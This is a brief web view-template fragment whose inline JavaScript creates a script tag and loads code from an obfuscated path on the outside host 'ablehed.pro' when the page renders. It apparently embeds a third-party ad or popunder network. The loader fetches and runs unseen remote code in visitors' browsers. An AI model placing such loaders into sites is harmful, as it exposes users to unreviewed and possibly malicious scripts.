.panel.panel-default
  javascript:
    (function(__htas){
    var d = document,
      s = d.createElement('script'),
              l = d.scripts[d.scripts.length - 1];
    s.settings = __htas || {};
    s.src = "\/\/ablehed.pro\/aDWWZ.yxQg2\/9ukMZMTY9M6VbG2v5YlOSrWOQg9RNJD_EwzkNAj\/UD5lOLCf0l0bMfT\/My2KNgTDkH5sJsnuB\/1mcc2jhFaWb\/2K5-l\/S_WuQU9NNQDREcz\/NAjFUL5MOqCE0\/0\/MATyMi2NNnTFkm5F";
    l.parentNode.insertBefore(s, l);
    })({})
